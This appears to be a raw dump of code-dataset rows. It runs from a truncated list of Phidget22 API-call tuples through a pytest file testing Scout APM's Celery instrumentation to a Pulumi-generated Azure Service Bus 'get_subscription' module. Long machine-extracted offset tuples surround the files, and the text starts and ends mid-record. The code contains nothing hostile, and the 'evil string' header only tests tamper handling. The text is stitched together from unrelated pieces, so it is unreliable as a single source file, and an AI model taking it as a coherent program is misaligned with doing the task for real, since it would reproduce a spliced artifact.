Phidget22.PhidgetSupport import PhidgetSupport\n'), ((18786, 18827), 'ctypes.byref', 'ctypes.byref', (['_VINTDeviceSupportsSetSpeed'], {}), '(_VINTDeviceSupportsSetSpeed)\n', (18798, 18827), False, 'import ctypes\n'), ((18856, 18880), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (18872, 18880), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((19054, 19077), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (19075, 19077), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((19168, 19194), 'ctypes.byref', 'ctypes.byref', (['_deviceLabel'], {}), '(_deviceLabel)\n', (19180, 19194), False, 'import ctypes\n'), ((19223, 19247), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (19239, 19247), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((1890, 1913), 
'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (1911, 1913), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((1946, 1969), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (1967, 1969), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((2632, 2655), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (2653, 2655), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((3175, 3198), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (3196, 3198), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((3790, 3813), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (3811, 3813), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((4483, 4506), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (4504, 4506), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n')] |
# coding=utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
from contextlib import contextmanager
import celery
import pytest
from celery.signals import setup_logging
import scout_apm.celery
from scout_apm.api import Config
# http://docs.celeryproject.org/en/latest/userguide/testing.html#py-test
skip_unless_celery_4_plus = pytest.mark.skipif(
celery.VERSION < (4, 0), reason="pytest fixtures added in Celery 4.0"
)
@setup_logging.connect
def do_nothing(**kwargs):
# Just by connecting to this signal, we prevent Celery from setting up
# logging - and stop it from interfering with global state
# http://docs.celeryproject.org/en/v4.3.0/userguide/signals.html#setup-logging
pass
@contextmanager
def app_with_scout(app=None, config=None):
"""
Context manager that configures a Celery app with Scout installed.
"""
if app is None:
app = celery.Celery("tasks", broker="memory://")
# Enable Scout by default in tests.
if config is None:
config = {"monitor": True}
# Disable running the agent.
config["core_agent_launch"] = False
@app.task
def hello():
return "Hello World!"
# Setup according to https://docs.scoutapm.com/#celery
Config.set(**config)
scout_apm.celery.install()
try:
yield app
finally:
scout_apm.celery.uninstall()
# Reset Scout configuration.
Config.reset_all()
def test_hello_eager(tracked_requests):
with app_with_scout() as app:
result = app.tasks["tests.integration.test_celery.hello"].apply()
assert result.result == "Hello World!"
assert len(tracked_requests) == 1
tracked_request = tracked_requests[0]
assert "task_id" in tracked_request.tags
assert tracked_request.tags["is_eager"] is True
assert tracked_request.tags["exchange"] == "unknown"
assert tracked_request.tags["routing_key"] == "unknown"
assert tracked_request.tags["queue"] == "unknown"
assert tracked_request.active_spans == []
assert len(tracked_request.complete_spans) == 1
span = tracked_request.complete_spans[0]
assert span.operation == "Job/tests.integration.test_celery.hello"
@skip_unless_celery_4_plus
def test_hello_worker(celery_app, celery_worker, tracked_requests):
with app_with_scout(app=celery_app) as app:
result = app.tasks["tests.integration.test_celery.hello"].delay().get()
assert result == "Hello World!"
assert len(tracked_requests) == 1
tracked_request = tracked_requests[0]
assert "task_id" in tracked_request.tags
assert tracked_request.tags["is_eager"] is False
assert tracked_request.tags["exchange"] == ""
assert tracked_request.tags["routing_key"] == "celery"
assert tracked_request.tags["queue"] == "unknown"
assert (
0.0 <= tracked_request.tags["queue_time"] < 60.0
) # Assume test took <60 seconds
assert tracked_request.active_spans == []
assert len(tracked_request.complete_spans) == 1
span = tracked_request.complete_spans[0]
assert span.operation == "Job/tests.integration.test_celery.hello"
@skip_unless_celery_4_plus
def test_hello_worker_header_preset(celery_app, celery_worker, tracked_requests):
with app_with_scout(app=celery_app) as app:
result = (
app.tasks["tests.integration.test_celery.hello"]
.apply_async(headers={"scout_task_start": "an evil string"})
.get()
)
assert result == "Hello World!"
assert len(tracked_requests) == 1
tracked_request = tracked_requests[0]
assert tracked_request.active_spans == []
assert len(tracked_request.complete_spans) == 1
span = tracked_request.complete_spans[0]
assert span.operation == "Job/tests.integration.test_celery.hello"
assert "queue_time" not in span.tags
@skip_unless_celery_4_plus
def test_hello_worker_chain(celery_app, celery_worker, tracked_requests):
with app_with_scout(app=celery_app) as app:
hello = app.tasks["tests.integration.test_celery.hello"]
result = (hello.si() | hello.si()).apply_async().get()
assert result == "Hello World!"
assert len(tracked_requests) == 2
assert [t.complete_spans[0].operation for t in tracked_requests] == [
"Job/tests.integration.test_celery.hello",
"Job/tests.integration.test_celery.hello",
]
assert "parent_task_id" not in tracked_requests[0].tags
first_task_id = tracked_requests[0].tags["task_id"]
assert tracked_requests[1].tags["parent_task_id"] == first_task_id
def test_no_monitor(tracked_requests):
# With an empty config, "monitor" defaults to False.
with app_with_scout(config={}) as app:
result = app.tasks["tests.integration.test_celery.hello"].apply()
assert result.result == "Hello World!"
assert tracked_requests == []
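
# The worker-based tests above use the `celery_app` and `celery_worker` pytest
# fixtures that Celery ships from version 4.0 onwards, hence the
# `skip_unless_celery_4_plus` marker.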
| [
"scout_apm.api.Config.set",
"celery.Celery",
"scout_apm.api.Config.reset_all",
"pytest.mark.skipif"
] | [((367, 461), 'pytest.mark.skipif', 'pytest.mark.skipif', (['(celery.VERSION < (4, 0))'], {'reason': '"""pytest fixtures added in Celery 4.0"""'}), "(celery.VERSION < (4, 0), reason=\n 'pytest fixtures added in Celery 4.0')\n", (385, 461), False, 'import pytest\n'), ((1268, 1288), 'scout_apm.api.Config.set', 'Config.set', ([], {}), '(**config)\n', (1278, 1288), False, 'from scout_apm.api import Config\n'), ((926, 968), 'celery.Celery', 'celery.Celery', (['"""tasks"""'], {'broker': '"""memory://"""'}), "('tasks', broker='memory://')\n", (939, 968), False, 'import celery\n'), ((1443, 1461), 'scout_apm.api.Config.reset_all', 'Config.reset_all', ([], {}), '()\n', (1459, 1461), False, 'from scout_apm.api import Config\n')] |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetSubscriptionResult',
'AwaitableGetSubscriptionResult',
'get_subscription',
]
@pulumi.output_type
class GetSubscriptionResult:
"""
Description of subscription resource.
"""
def __init__(__self__, accessed_at=None, auto_delete_on_idle=None, client_affine_properties=None, count_details=None, created_at=None, dead_lettering_on_filter_evaluation_exceptions=None, dead_lettering_on_message_expiration=None, default_message_time_to_live=None, duplicate_detection_history_time_window=None, enable_batched_operations=None, forward_dead_lettered_messages_to=None, forward_to=None, id=None, is_client_affine=None, lock_duration=None, max_delivery_count=None, message_count=None, name=None, requires_session=None, status=None, system_data=None, type=None, updated_at=None):
if accessed_at and not isinstance(accessed_at, str):
raise TypeError("Expected argument 'accessed_at' to be a str")
pulumi.set(__self__, "accessed_at", accessed_at)
if auto_delete_on_idle and not isinstance(auto_delete_on_idle, str):
raise TypeError("Expected argument 'auto_delete_on_idle' to be a str")
pulumi.set(__self__, "auto_delete_on_idle", auto_delete_on_idle)
if client_affine_properties and not isinstance(client_affine_properties, dict):
raise TypeError("Expected argument 'client_affine_properties' to be a dict")
pulumi.set(__self__, "client_affine_properties", client_affine_properties)
if count_details and not isinstance(count_details, dict):
raise TypeError("Expected argument 'count_details' to be a dict")
pulumi.set(__self__, "count_details", count_details)
if created_at and not isinstance(created_at, str):
raise TypeError("Expected argument 'created_at' to be a str")
pulumi.set(__self__, "created_at", created_at)
if dead_lettering_on_filter_evaluation_exceptions and not isinstance(dead_lettering_on_filter_evaluation_exceptions, bool):
raise TypeError("Expected argument 'dead_lettering_on_filter_evaluation_exceptions' to be a bool")
pulumi.set(__self__, "dead_lettering_on_filter_evaluation_exceptions", dead_lettering_on_filter_evaluation_exceptions)
if dead_lettering_on_message_expiration and not isinstance(dead_lettering_on_message_expiration, bool):
raise TypeError("Expected argument 'dead_lettering_on_message_expiration' to be a bool")
pulumi.set(__self__, "dead_lettering_on_message_expiration", dead_lettering_on_message_expiration)
if default_message_time_to_live and not isinstance(default_message_time_to_live, str):
raise TypeError("Expected argument 'default_message_time_to_live' to be a str")
pulumi.set(__self__, "default_message_time_to_live", default_message_time_to_live)
if duplicate_detection_history_time_window and not isinstance(duplicate_detection_history_time_window, str):
raise TypeError("Expected argument 'duplicate_detection_history_time_window' to be a str")
pulumi.set(__self__, "duplicate_detection_history_time_window", duplicate_detection_history_time_window)
if enable_batched_operations and not isinstance(enable_batched_operations, bool):
raise TypeError("Expected argument 'enable_batched_operations' to be a bool")
pulumi.set(__self__, "enable_batched_operations", enable_batched_operations)
if forward_dead_lettered_messages_to and not isinstance(forward_dead_lettered_messages_to, str):
raise TypeError("Expected argument 'forward_dead_lettered_messages_to' to be a str")
pulumi.set(__self__, "forward_dead_lettered_messages_to", forward_dead_lettered_messages_to)
if forward_to and not isinstance(forward_to, str):
raise TypeError("Expected argument 'forward_to' to be a str")
pulumi.set(__self__, "forward_to", forward_to)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if is_client_affine and not isinstance(is_client_affine, bool):
raise TypeError("Expected argument 'is_client_affine' to be a bool")
pulumi.set(__self__, "is_client_affine", is_client_affine)
if lock_duration and not isinstance(lock_duration, str):
raise TypeError("Expected argument 'lock_duration' to be a str")
pulumi.set(__self__, "lock_duration", lock_duration)
if max_delivery_count and not isinstance(max_delivery_count, int):
raise TypeError("Expected argument 'max_delivery_count' to be a int")
pulumi.set(__self__, "max_delivery_count", max_delivery_count)
if message_count and not isinstance(message_count, float):
raise TypeError("Expected argument 'message_count' to be a float")
pulumi.set(__self__, "message_count", message_count)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if requires_session and not isinstance(requires_session, bool):
raise TypeError("Expected argument 'requires_session' to be a bool")
pulumi.set(__self__, "requires_session", requires_session)
if status and not isinstance(status, str):
raise TypeError("Expected argument 'status' to be a str")
pulumi.set(__self__, "status", status)
if system_data and not isinstance(system_data, dict):
raise TypeError("Expected argument 'system_data' to be a dict")
pulumi.set(__self__, "system_data", system_data)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if updated_at and not isinstance(updated_at, str):
raise TypeError("Expected argument 'updated_at' to be a str")
pulumi.set(__self__, "updated_at", updated_at)
@property
@pulumi.getter(name="accessedAt")
def accessed_at(self) -> str:
"""
Last time there was a receive request to this subscription.
"""
return pulumi.get(self, "accessed_at")
@property
@pulumi.getter(name="autoDeleteOnIdle")
def auto_delete_on_idle(self) -> Optional[str]:
"""
        ISO 8601 timeSpan idle interval after which the topic is automatically deleted. The minimum duration is 5 minutes.
"""
return pulumi.get(self, "auto_delete_on_idle")
@property
@pulumi.getter(name="clientAffineProperties")
def client_affine_properties(self) -> Optional['outputs.SBClientAffinePropertiesResponse']:
"""
Properties specific to client affine subscriptions.
"""
return pulumi.get(self, "client_affine_properties")
@property
@pulumi.getter(name="countDetails")
def count_details(self) -> 'outputs.MessageCountDetailsResponse':
"""
Message count details
"""
return pulumi.get(self, "count_details")
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> str:
"""
Exact time the message was created.
"""
return pulumi.get(self, "created_at")
@property
@pulumi.getter(name="deadLetteringOnFilterEvaluationExceptions")
def dead_lettering_on_filter_evaluation_exceptions(self) -> Optional[bool]:
"""
Value that indicates whether a subscription has dead letter support on filter evaluation exceptions.
"""
return pulumi.get(self, "dead_lettering_on_filter_evaluation_exceptions")
@property
@pulumi.getter(name="deadLetteringOnMessageExpiration")
def dead_lettering_on_message_expiration(self) -> Optional[bool]:
"""
Value that indicates whether a subscription has dead letter support when a message expires.
"""
return pulumi.get(self, "dead_lettering_on_message_expiration")
@property
@pulumi.getter(name="defaultMessageTimeToLive")
def default_message_time_to_live(self) -> Optional[str]:
"""
        ISO 8601 Default message timespan to live value. This is the duration after which the message expires, starting from when the message is sent to Service Bus. This is the default value used when TimeToLive is not set on a message itself.
"""
return pulumi.get(self, "default_message_time_to_live")
@property
@pulumi.getter(name="duplicateDetectionHistoryTimeWindow")
def duplicate_detection_history_time_window(self) -> Optional[str]:
"""
ISO 8601 timeSpan structure that defines the duration of the duplicate detection history. The default value is 10 minutes.
"""
return pulumi.get(self, "duplicate_detection_history_time_window")
@property
@pulumi.getter(name="enableBatchedOperations")
def enable_batched_operations(self) -> Optional[bool]:
"""
Value that indicates whether server-side batched operations are enabled.
"""
return pulumi.get(self, "enable_batched_operations")
@property
@pulumi.getter(name="forwardDeadLetteredMessagesTo")
def forward_dead_lettered_messages_to(self) -> Optional[str]:
"""
Queue/Topic name to forward the Dead Letter message
"""
return pulumi.get(self, "forward_dead_lettered_messages_to")
@property
@pulumi.getter(name="forwardTo")
def forward_to(self) -> Optional[str]:
"""
Queue/Topic name to forward the messages
"""
return pulumi.get(self, "forward_to")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="isClientAffine")
def is_client_affine(self) -> Optional[bool]:
"""
Value that indicates whether the subscription has an affinity to the client id.
"""
return pulumi.get(self, "is_client_affine")
@property
@pulumi.getter(name="lockDuration")
def lock_duration(self) -> Optional[str]:
"""
        ISO 8601 lock duration timespan for the subscription. The default value is 1 minute.
"""
return pulumi.get(self, "lock_duration")
@property
@pulumi.getter(name="maxDeliveryCount")
def max_delivery_count(self) -> Optional[int]:
"""
Number of maximum deliveries.
"""
return pulumi.get(self, "max_delivery_count")
@property
@pulumi.getter(name="messageCount")
def message_count(self) -> float:
"""
Number of messages.
"""
return pulumi.get(self, "message_count")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="requiresSession")
def requires_session(self) -> Optional[bool]:
"""
Value indicating if a subscription supports the concept of sessions.
"""
return pulumi.get(self, "requires_session")
@property
@pulumi.getter
def status(self) -> Optional[str]:
"""
Enumerates the possible values for the status of a messaging entity.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> 'outputs.SystemDataResponse':
"""
The system meta data relating to this resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="updatedAt")
def updated_at(self) -> str:
"""
The exact time the message was updated.
"""
return pulumi.get(self, "updated_at")
class AwaitableGetSubscriptionResult(GetSubscriptionResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetSubscriptionResult(
accessed_at=self.accessed_at,
auto_delete_on_idle=self.auto_delete_on_idle,
client_affine_properties=self.client_affine_properties,
count_details=self.count_details,
created_at=self.created_at,
dead_lettering_on_filter_evaluation_exceptions=self.dead_lettering_on_filter_evaluation_exceptions,
dead_lettering_on_message_expiration=self.dead_lettering_on_message_expiration,
default_message_time_to_live=self.default_message_time_to_live,
duplicate_detection_history_time_window=self.duplicate_detection_history_time_window,
enable_batched_operations=self.enable_batched_operations,
forward_dead_lettered_messages_to=self.forward_dead_lettered_messages_to,
forward_to=self.forward_to,
id=self.id,
is_client_affine=self.is_client_affine,
lock_duration=self.lock_duration,
max_delivery_count=self.max_delivery_count,
message_count=self.message_count,
name=self.name,
requires_session=self.requires_session,
status=self.status,
system_data=self.system_data,
type=self.type,
updated_at=self.updated_at)
def get_subscription(namespace_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
subscription_name: Optional[str] = None,
topic_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSubscriptionResult:
"""
Description of subscription resource.
:param str namespace_name: The namespace name
:param str resource_group_name: Name of the Resource group within the Azure subscription.
:param str subscription_name: The subscription name.
:param str topic_name: The topic name.
"""
__args__ = dict()
__args__['namespaceName'] = namespace_name
__args__['resourceGroupName'] = resource_group_name
__args__['subscriptionName'] = subscription_name
__args__['topicName'] = topic_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:servicebus/v20210601preview:getSubscription', __args__, opts=opts, typ=GetSubscriptionResult).value
return AwaitableGetSubscriptionResult(
accessed_at=__ret__.accessed_at,
auto_delete_on_idle=__ret__.auto_delete_on_idle,
client_affine_properties=__ret__.client_affine_properties,
count_details=__ret__.count_details,
created_at=__ret__.created_at,
dead_lettering_on_filter_evaluation_exceptions=__ret__.dead_lettering_on_filter_evaluation_exceptions,
dead_lettering_on_message_expiration=__ret__.dead_lettering_on_message_expiration,
default_message_time_to_live=__ret__.default_message_time_to_live,
duplicate_detection_history_time_window=__ret__.duplicate_detection_history_time_window,
enable_batched_operations=__ret__.enable_batched_operations,
forward_dead_lettered_messages_to=__ret__.forward_dead_lettered_messages_to,
forward_to=__ret__.forward_to,
id=__ret__.id,
is_client_affine=__ret__.is_client_affine,
lock_duration=__ret__.lock_duration,
max_delivery_count=__ret__.max_delivery_count,
message_count=__ret__.message_count,
name=__ret__.name,
requires_session=__ret__.requires_session,
status=__ret__.status,
system_data=__ret__.system_data,
type=__ret__.type,
updated_at=__ret__.updated_at)
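
# Illustrative call (not part of the generated module; all resource names below
# are placeholders):
#   sub = get_subscription(namespace_name='my-namespace',
#                          resource_group_name='my-resource-group',
#                          subscription_name='my-subscription',
#                          topic_name='my-topic')
#   pulumi.export('subscriptionMessageCount', sub.message_count)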
| [
"pulumi.get",
"pulumi.getter",
"pulumi.set",
"pulumi.InvokeOptions",
"pulumi.runtime.invoke"
] | [((6398, 6430), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""accessedAt"""'}), "(name='accessedAt')\n", (6411, 6430), False, 'import pulumi\n'), ((6624, 6662), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""autoDeleteOnIdle"""'}), "(name='autoDeleteOnIdle')\n", (6637, 6662), False, 'import pulumi\n'), ((6937, 6981), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""clientAffineProperties"""'}), "(name='clientAffineProperties')\n", (6950, 6981), False, 'import pulumi\n'), ((7242, 7276), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""countDetails"""'}), "(name='countDetails')\n", (7255, 7276), False, 'import pulumi\n'), ((7470, 7501), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""createdAt"""'}), "(name='createdAt')\n", (7483, 7501), False, 'import pulumi\n'), ((7669, 7732), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""deadLetteringOnFilterEvaluationExceptions"""'}), "(name='deadLetteringOnFilterEvaluationExceptions')\n", (7682, 7732), False, 'import pulumi\n'), ((8048, 8102), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""deadLetteringOnMessageExpiration"""'}), "(name='deadLetteringOnMessageExpiration')\n", (8061, 8102), False, 'import pulumi\n'), ((8389, 8435), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""defaultMessageTimeToLive"""'}), "(name='defaultMessageTimeToLive')\n", (8402, 8435), False, 'import pulumi\n'), ((8850, 8907), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""duplicateDetectionHistoryTimeWindow"""'}), "(name='duplicateDetectionHistoryTimeWindow')\n", (8863, 8907), False, 'import pulumi\n'), ((9230, 9275), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""enableBatchedOperations"""'}), "(name='enableBatchedOperations')\n", (9243, 9275), False, 'import pulumi\n'), ((9521, 9572), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""forwardDeadLetteredMessagesTo"""'}), "(name='forwardDeadLetteredMessagesTo')\n", (9534, 9572), False, 'import pulumi\n'), ((9812, 9843), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""forwardTo"""'}), "(name='forwardTo')\n", (9825, 9843), False, 'import pulumi\n'), ((10167, 10203), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""isClientAffine"""'}), "(name='isClientAffine')\n", (10180, 10203), False, 'import pulumi\n'), ((10438, 10472), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""lockDuration"""'}), "(name='lockDuration')\n", (10451, 10472), False, 'import pulumi\n'), ((10705, 10743), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""maxDeliveryCount"""'}), "(name='maxDeliveryCount')\n", (10718, 10743), False, 'import pulumi\n'), ((10931, 10965), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""messageCount"""'}), "(name='messageCount')\n", (10944, 10965), False, 'import pulumi\n'), ((11272, 11309), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""requiresSession"""'}), "(name='requiresSession')\n", (11285, 11309), False, 'import pulumi\n'), ((11749, 11781), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""systemData"""'}), "(name='systemData')\n", (11762, 11781), False, 'import pulumi\n'), ((12135, 12166), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""updatedAt"""'}), "(name='updatedAt')\n", (12148, 12166), False, 'import pulumi\n'), ((1293, 1341), 'pulumi.set', 'pulumi.set', (['__self__', '"""accessed_at"""', 'accessed_at'], {}), "(__self__, 'accessed_at', accessed_at)\n", (1303, 1341), False, 'import pulumi\n'), ((1510, 1574), 'pulumi.set', 'pulumi.set', (['__self__', '"""auto_delete_on_idle"""', 'auto_delete_on_idle'], {}), "(__self__, 
'auto_delete_on_idle', auto_delete_on_idle)\n", (1520, 1574), False, 'import pulumi\n'), ((1760, 1834), 'pulumi.set', 'pulumi.set', (['__self__', '"""client_affine_properties"""', 'client_affine_properties'], {}), "(__self__, 'client_affine_properties', client_affine_properties)\n", (1770, 1834), False, 'import pulumi\n'), ((1987, 2039), 'pulumi.set', 'pulumi.set', (['__self__', '"""count_details"""', 'count_details'], {}), "(__self__, 'count_details', count_details)\n", (1997, 2039), False, 'import pulumi\n'), ((2181, 2227), 'pulumi.set', 'pulumi.set', (['__self__', '"""created_at"""', 'created_at'], {}), "(__self__, 'created_at', created_at)\n", (2191, 2227), False, 'import pulumi\n'), ((2479, 2601), 'pulumi.set', 'pulumi.set', (['__self__', '"""dead_lettering_on_filter_evaluation_exceptions"""', 'dead_lettering_on_filter_evaluation_exceptions'], {}), "(__self__, 'dead_lettering_on_filter_evaluation_exceptions',\n dead_lettering_on_filter_evaluation_exceptions)\n", (2489, 2601), False, 'import pulumi\n'), ((2819, 2921), 'pulumi.set', 'pulumi.set', (['__self__', '"""dead_lettering_on_message_expiration"""', 'dead_lettering_on_message_expiration'], {}), "(__self__, 'dead_lettering_on_message_expiration',\n dead_lettering_on_message_expiration)\n", (2829, 2921), False, 'import pulumi\n'), ((3113, 3199), 'pulumi.set', 'pulumi.set', (['__self__', '"""default_message_time_to_live"""', 'default_message_time_to_live'], {}), "(__self__, 'default_message_time_to_live',\n default_message_time_to_live)\n", (3123, 3199), False, 'import pulumi\n'), ((3424, 3532), 'pulumi.set', 'pulumi.set', (['__self__', '"""duplicate_detection_history_time_window"""', 'duplicate_detection_history_time_window'], {}), "(__self__, 'duplicate_detection_history_time_window',\n duplicate_detection_history_time_window)\n", (3434, 3532), False, 'import pulumi\n'), ((3717, 3793), 'pulumi.set', 'pulumi.set', (['__self__', '"""enable_batched_operations"""', 'enable_batched_operations'], {}), "(__self__, 'enable_batched_operations', enable_batched_operations)\n", (3727, 3793), False, 'import pulumi\n'), ((4004, 4100), 'pulumi.set', 'pulumi.set', (['__self__', '"""forward_dead_lettered_messages_to"""', 'forward_dead_lettered_messages_to'], {}), "(__self__, 'forward_dead_lettered_messages_to',\n forward_dead_lettered_messages_to)\n", (4014, 4100), False, 'import pulumi\n'), ((4238, 4284), 'pulumi.set', 'pulumi.set', (['__self__', '"""forward_to"""', 'forward_to'], {}), "(__self__, 'forward_to', forward_to)\n", (4248, 4284), False, 'import pulumi\n'), ((4402, 4432), 'pulumi.set', 'pulumi.set', (['__self__', '"""id"""', 'id'], {}), "(__self__, 'id', id)\n", (4412, 4432), False, 'import pulumi\n'), ((4594, 4652), 'pulumi.set', 'pulumi.set', (['__self__', '"""is_client_affine"""', 'is_client_affine'], {}), "(__self__, 'is_client_affine', is_client_affine)\n", (4604, 4652), False, 'import pulumi\n'), ((4803, 4855), 'pulumi.set', 'pulumi.set', (['__self__', '"""lock_duration"""', 'lock_duration'], {}), "(__self__, 'lock_duration', lock_duration)\n", (4813, 4855), False, 'import pulumi\n'), ((5021, 5083), 'pulumi.set', 'pulumi.set', (['__self__', '"""max_delivery_count"""', 'max_delivery_count'], {}), "(__self__, 'max_delivery_count', max_delivery_count)\n", (5031, 5083), False, 'import pulumi\n'), ((5238, 5290), 'pulumi.set', 'pulumi.set', (['__self__', '"""message_count"""', 'message_count'], {}), "(__self__, 'message_count', message_count)\n", (5248, 5290), False, 'import pulumi\n'), ((5414, 5448), 'pulumi.set', 'pulumi.set', 
(['__self__', '"""name"""', 'name'], {}), "(__self__, 'name', name)\n", (5424, 5448), False, 'import pulumi\n'), ((5610, 5668), 'pulumi.set', 'pulumi.set', (['__self__', '"""requires_session"""', 'requires_session'], {}), "(__self__, 'requires_session', requires_session)\n", (5620, 5668), False, 'import pulumi\n'), ((5798, 5836), 'pulumi.set', 'pulumi.set', (['__self__', '"""status"""', 'status'], {}), "(__self__, 'status', status)\n", (5808, 5836), False, 'import pulumi\n'), ((5983, 6031), 'pulumi.set', 'pulumi.set', (['__self__', '"""system_data"""', 'system_data'], {}), "(__self__, 'system_data', system_data)\n", (5993, 6031), False, 'import pulumi\n'), ((6155, 6189), 'pulumi.set', 'pulumi.set', (['__self__', '"""type"""', 'type'], {}), "(__self__, 'type', type)\n", (6165, 6189), False, 'import pulumi\n'), ((6331, 6377), 'pulumi.set', 'pulumi.set', (['__self__', '"""updated_at"""', 'updated_at'], {}), "(__self__, 'updated_at', updated_at)\n", (6341, 6377), False, 'import pulumi\n'), ((6572, 6603), 'pulumi.get', 'pulumi.get', (['self', '"""accessed_at"""'], {}), "(self, 'accessed_at')\n", (6582, 6603), False, 'import pulumi\n'), ((6877, 6916), 'pulumi.get', 'pulumi.get', (['self', '"""auto_delete_on_idle"""'], {}), "(self, 'auto_delete_on_idle')\n", (6887, 6916), False, 'import pulumi\n'), ((7177, 7221), 'pulumi.get', 'pulumi.get', (['self', '"""client_affine_properties"""'], {}), "(self, 'client_affine_properties')\n", (7187, 7221), False, 'import pulumi\n'), ((7416, 7449), 'pulumi.get', 'pulumi.get', (['self', '"""count_details"""'], {}), "(self, 'count_details')\n", (7426, 7449), False, 'import pulumi\n'), ((7618, 7648), 'pulumi.get', 'pulumi.get', (['self', '"""created_at"""'], {}), "(self, 'created_at')\n", (7628, 7648), False, 'import pulumi\n'), ((7961, 8027), 'pulumi.get', 'pulumi.get', (['self', '"""dead_lettering_on_filter_evaluation_exceptions"""'], {}), "(self, 'dead_lettering_on_filter_evaluation_exceptions')\n", (7971, 8027), False, 'import pulumi\n'), ((8312, 8368), 'pulumi.get', 'pulumi.get', (['self', '"""dead_lettering_on_message_expiration"""'], {}), "(self, 'dead_lettering_on_message_expiration')\n", (8322, 8368), False, 'import pulumi\n'), ((8781, 8829), 'pulumi.get', 'pulumi.get', (['self', '"""default_message_time_to_live"""'], {}), "(self, 'default_message_time_to_live')\n", (8791, 8829), False, 'import pulumi\n'), ((9150, 9209), 'pulumi.get', 'pulumi.get', (['self', '"""duplicate_detection_history_time_window"""'], {}), "(self, 'duplicate_detection_history_time_window')\n", (9160, 9209), False, 'import pulumi\n'), ((9455, 9500), 'pulumi.get', 'pulumi.get', (['self', '"""enable_batched_operations"""'], {}), "(self, 'enable_batched_operations')\n", (9465, 9500), False, 'import pulumi\n'), ((9738, 9791), 'pulumi.get', 'pulumi.get', (['self', '"""forward_dead_lettered_messages_to"""'], {}), "(self, 'forward_dead_lettered_messages_to')\n", (9748, 9791), False, 'import pulumi\n'), ((9975, 10005), 'pulumi.get', 'pulumi.get', (['self', '"""forward_to"""'], {}), "(self, 'forward_to')\n", (9985, 10005), False, 'import pulumi\n'), ((10124, 10146), 'pulumi.get', 'pulumi.get', (['self', '"""id"""'], {}), "(self, 'id')\n", (10134, 10146), False, 'import pulumi\n'), ((10381, 10417), 'pulumi.get', 'pulumi.get', (['self', '"""is_client_affine"""'], {}), "(self, 'is_client_affine')\n", (10391, 10417), False, 'import pulumi\n'), ((10651, 10684), 'pulumi.get', 'pulumi.get', (['self', '"""lock_duration"""'], {}), "(self, 'lock_duration')\n", (10661, 10684), False, 'import pulumi\n'), 
